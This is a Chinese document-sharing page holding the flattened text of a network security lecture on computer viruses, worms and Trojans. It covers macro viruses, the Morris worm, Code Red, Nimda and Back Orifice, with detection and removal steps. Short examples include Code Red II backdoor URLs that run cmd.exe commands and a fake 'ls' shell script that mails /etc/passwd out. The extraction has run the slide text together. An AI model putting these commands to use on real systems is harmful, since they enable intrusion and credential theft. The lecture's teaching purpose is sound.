计算机病毒、蠕虫和特洛伊木马介绍(网络安全基础课讲义).ppt

上传人:zhu****ei 文档编号:3592166 上传时间:2019-12-18 格式:PPT 页数:44 大小:4.76MB
返回 下载 相关 举报
计算机病毒、蠕虫和特洛伊木马介绍(网络安全基础课讲义).ppt_第1页
第1页 / 共44页
计算机病毒、蠕虫和特洛伊木马介绍(网络安全基础课讲义).ppt_第2页
第2页 / 共44页
计算机病毒、蠕虫和特洛伊木马介绍(网络安全基础课讲义).ppt_第3页
第3页 / 共44页
点击查看更多>>
资源描述
计算机病毒、蠕虫和特洛伊木马,提纲,计算机病毒网络蠕虫特洛伊木马,计算机病毒,病毒结构模型病毒的分类引导型病毒文件型病毒宏病毒病毒举例病毒防范,计算机病毒的结构,传染条件判断,传染代码,表现及破坏条件判断,破坏代码,传染模块,表现模块,计算机病毒的分类,按攻击平台分类:DOS,Win32,MAC,Unix按危害分类:良性、恶性按代码形式:源码、中间代码、目标码按宿主分类:引导型主引导区操作系统引导区文件型操作系统应用程序宏病毒,引导型病毒引导记录,主引导记录(MBR),A,引导型病毒系统引导过程,PowerOn,CPUsetuptofindafileINT21;findthehostfileMOVAX,3D02;setuptoopenthehostfileINT21;openhostfileMOVAH,40;setuptowritefiletodiskINT21;writetofileDB*.COM;whatfilestolookfor,宏病毒(MacroVirus),历史:1980年,Dr.FredrickCohenandRalfBurger论文1994年,MicrosoftWord第一例宏病毒Word,Excel,Access,PowerPoint,Project,LotusAmiPro,Visio,Lotus1-2-3,AutoCAD,CorelDraw.使用数据文件进行传播,使得反病毒软件不再只关注可执行文件和引导区DOEViRT统计,85%的病毒感染归因于宏病毒易于编写,只需要一两天的时间,1015行代码大量的用户:90MillionMSOfficeUsers人们通常不交换程序,而交换数据,宏病毒工作机理,有毒文件.doc,Normal.dot,无毒文件.doc,Normal.dot,注意事项,Macro可以存在模板里,也可以存在文档里RTF文件也可以包含宏病毒通过IE浏览器可以直接打开,而不提示下载,提纲,计算机病毒网络蠕虫特洛伊木马,蠕虫(Worm),一个独立的计算机程序,不需要宿主自我复制,自主传播(Mobile)占用系统或网络资源、破坏其他程序不伪装成其他程序,靠自主传播利用系统漏洞;利用电子邮件(无需用户参与),莫里斯蠕虫事件,发生于1988年,当时导致大约6000台机器瘫痪主要的攻击方法Rsh,rexec:用户的缺省认证Sendmail的debug模式Fingerd的缓冲区溢出口令猜测,CRI,主要影响WindowsNT系统和Windows2000主要影响国外网络据CERT统计,至8月初已经感染超过25万台主要行为利用IIS的Index服务的缓冲区溢出缺陷进入系统检查c:notworm文件是否存在以判断是否感染中文保护(是中文windows就不修改主页)攻击白宫!,CRII,InspiredbyRCI影响波及全球国内影响尤其广泛主要行为所利用缺陷相同只感染windows2000系统,由于一些参数的问题,只会导致NT死机休眠与扫描:中文windows,600个线程,Nimda简介,影响系统:MSwin9x,wind2k,winXP传播途径:Email、文件共享、页面浏览、MSIIS目录遍历、CodeRed后门影响群发电子邮件,付病毒扫描共享文件夹,扫描有漏洞的IIS,扫描有CodeRed后门的IISServer,红色代码病毒,红色代码病毒是一种结合了病毒、木马、DDOS机制的蠕虫。2001年7月中旬,在美国等地大规模蔓延。2001年8月初,出现变种coderedII,针对中文版windows系统,国内大规模蔓延。通过80端口传播。只存在与网络服务器的内存,不通过文件载体。利用IIS缓冲区溢出漏洞(2001年6月18日发布),CodeRedI,在侵入一台服务器后,其运行步骤是:设置运行环境,修改堆栈指针,设置堆栈大小为218h字节。接着使用RVA(相对虚拟地址)查找GetProcAddress的函数地址,然后就获得其他socket、connect、send、recv、closesocket等函数地址;如果C:notworm在,不再进一步传染;传染其他主机。创造100个线程,其中99个用户感染其他WEB服务器,被攻击IP通过一个算法计算得出;篡改主页,如果系统默认语言为“美国英语”,第100个进程就将这台服务的主页改成“Welcometo!,HackedByChinese!”,并持续10个小时。(这个修改直接在内存中修改,而不是修改*.htm文件);如果时间在20:00UTC和23:59UTC之间,将反复和白宫主页建立连接,并发送98k字节数据,形成DDOS攻击。,CodeRedII,增加了特洛依木马的功能,并针对中国网站做了改进计算IP的方法进行了修改,使病毒传染的更快;检查是否存在CodeRedII原子,若存在则进入睡眠状态防止反复感染,若不存在则创建CodeRedII原子;创建300个线程进行传染,若系统默认语言为简体中文或繁体中文,则创建600个线程;检查时间。病毒作者的意图是传播过程在2001年10月1日完成,之后,蠕虫会爆发而使系统不断重新启动。在系统中安装一个特洛依木马:拷贝系统目录cmd.exe到IIS的脚本执行目录下,改名为root.exe;将病毒体内的木马解压缩写到C盘和D盘的explorer.exe木马每次系统和启动都会运行,禁止系统的文件保护功能,并将C盘和D盘通过web服务器共享,CodeRedII,攻击形式http:/x.x.x.x/c/inetpub/scripts/root.exe?/c+dirhttp:/x.x.x.x/c/winnt/system32/cmd.exe?/c+dir其中x.x.x.x是被攻击的IP地址,dir可以是任意命令,比如删除系统中的文件,向外发送机密数据等,这个后门后来也成为了nimda病毒的一个传播模式。下面是cert/cc上提供的被攻击服务器日志(CA-2001-11)2001-05-0612:20:1910.10.10.10-10.20.20.2080GET/scripts/././winnt/system32/cmd.exe/c+dir2002001-05-0612:20:1910.10.10.10-10.20.20.2080GET/scripts/././winnt/system32/cmd.exe/c+dir+.200,红色代码病毒的检测和防范,针对安装IIS的windows系统;是否出现负载显著增加(CPU/网络)的现象;用netstatan检查是否有许多对外的80端口连接在web日志中检查是否有/default.ida?xxx.%u0078%u0000u00=aHTTP/1.0这样的攻击记录;查找系统中是否存在文件c:explorer.exe或d:explorer.exe以及root.exe;检查注册表文件中是否增加了C和D虚拟目录,以及文件保护功能是否被禁止。在任务管理器中检查是否存在两个explorer.exe进程。,提纲,计算机病毒网络蠕虫特洛伊木马,特洛伊木马,名字来源:古希腊故事通过伪装成其他程序、有意隐藏自己恶意行为的程序,通常留下一个远程控制的后门没有自我复制的功能非自主传播用户主动发送给其他人放到网站上由用户下载,最简单的木马举例,ls#!/bin/sh/bin/mailmyaddress/etc/passwdls,PATH=./:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin,特洛依木马举例,BackOrificeCultoftheDeadCow在1998年8月发布,公开源码软件,遵守GPL,是功能强大的远程控制器木马。boserver.exe、boconfig.exe、bogui.exe在BO服务器上启动、停止基于文本的应用程序目录和文件操作。包括创建、删除、查看目录、查找、解压、压缩。共享。创建共享资源HTTP服务。启动或停止HTTP服务。击键记录。将BO服务器上用户的击键记录在一个文本文件中,同时记录执行输入的窗口名。(可以获得用户口令),特洛依木马,视频输入、播放。捕捉服务器屏幕到一个位图文件中。网络连接。列出和断开BO服务器上接入和接出的连接,可以发起新连接。查看信息。查看所有网络端口、域名、服务器和可见的共享“出口”。返回系统信息,包括机器名、当前用户、CPU类型、内存容量及可用内存、Windows版本、驱动器类型、硬盘容量及使用空间。端口重定向。注册表锁住或重启计算机。传输文件,特洛依木马,使用netstata检查是否还有未知端口监听(默认31337)检测和删除注册表HLMsoftwaremicrosoftwindowscurrentVersionrunservices键值,是否有“NameData.exe”,若有则删除C:windowssystem目录:删除“.exe”文件和windll.dll文件,特洛依木马,其他木马国外subsever、dagger、ACKcmdC、DeepThroat、SatansBackdoor等国内(更常见)冰河、广外女生、netspy、黑洞等,删除木马的通用方法,Win.ini文件windows节中run=和loadsystem.ini文件boot节的shell=explorer.exeAutoexec.bat文件win命令注册表HLMsoftwaremicrosoftwindowscurrentversionrunHCUsoftwaremicrosoftwindowscurrentversionrunonceHCRexefileshellopencommand“%1”%*HCUcontrolpaneldesktopwallpaper,更高级的木马技术,服务器端程序文件的隐藏问题:磁盘上的文件、系统中的进程木马:DLL陷阱防范:DLL签名技术隐藏端口监听寄生:选择一个已经打开的端口,如80潜伏:不使用TCP/UDP,使用ICMP突破防火墙的限制反弹端口型木马:,突破防火墙的限制:反弹端口型木马,WebServer,病毒、蠕虫与木马的比较,提纲,网络攻击方法窃听口令破解端口扫描和信息收集缓冲区溢出漏洞扫描拒绝服务恶意移动代码计算机病毒网络蠕虫特洛伊木马其他恶意代码,
展开阅读全文
相关资源
正为您匹配相似的精品文档
相关搜索

最新文档


当前位置:首页 > 图纸专区 > 课件教案


copyright@ 2023-2025  zhuangpeitu.com 装配图网版权所有   联系电话:18123376007

备案号:ICP2024067431-1 川公网安备51140202000466号


本站为文档C2C交易模式,即用户上传的文档直接被用户下载,本站只是中间服务平台,本站所有文档下载所得的收益归上传人(含作者)所有。装配图网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对上载内容本身不做任何修改或编辑。若文档所含内容侵犯了您的版权或隐私,请立即通知装配图网,我们立即给予删除!